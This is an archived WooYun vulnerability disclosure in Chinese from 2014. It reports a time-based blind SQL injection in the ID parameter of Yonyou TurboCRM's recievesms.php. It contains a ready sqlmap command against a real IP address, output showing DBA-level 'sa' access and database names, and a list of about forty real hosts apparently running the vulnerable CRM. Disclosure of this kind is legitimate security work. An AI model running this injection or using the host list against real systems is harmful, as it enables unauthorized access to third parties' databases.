乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-27: 细节已通知厂商并且等待厂商处理中 2014-07-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-08-26: 细节向核心白帽子及相关领域专家公开 2014-09-05: 细节向普通白帽子公开 2014-09-15: 细节向实习白帽子公开 2014-09-22: 细节向公众公开
用友某通用系统注入
用友TurboCRM存在通用sql注入。
http://220.178.27.116:8001/background/recievesms.php?ID=1
ID参数未做过滤存在mssql timebased盲注。
sqlmap.py -u "http://220.178.27.116:8001//background/recievesms.php?ID=1" --dbs --current-user --current-db --is-dba
[*] master[*] model[*] msdb[*] tempdb[*] turbocrm70[*] UFDATA_001_2011[*] UFMeta_002_2011...略...
current user: 'sa'current database: 'turbocrm70'current user is DBA: True
整理出了以下使用这套crm的网站,title:用友TurboCRM
218.94.82.23prm.ufida.com.cncrm.landwind.com.cncrm.szclou.comhttp://yindajituan.gicp.net:8888182.135.191.86111.40.0.242:9091222.171.32.36:9091219.90.119.35:8081180.168.98.94:8088prm.yonyou.comwww.kdlian.com:8001prm.chanjet.comqinyuancrm.comkfdq369.gicp.net220.113.5.194218.84.134.162:8088turbocrm.yofc.comcrm.elfa.com.cncrm.pearmain.cnnc.shineroad.comcrm.westernpower.cncrm7.abgroup.cncrm.transn.netzh4433.vicp.net218.108.86.226crm.yiwenkeji.com:8080218.95.66.88:9036crm.digisystem.com.cn:8080crm.shineroad.comcrm.siweidg.com222.41.174.190:8088117.36.76.254:8080hq.longmanschools.com.cn:808059.50.33.86:9000182.135.191.87crm.szclou.com:808858.220.225.28:8080
...........
危害等级:无影响厂商忽略
忽略时间:2014-09-22 11:42
暂无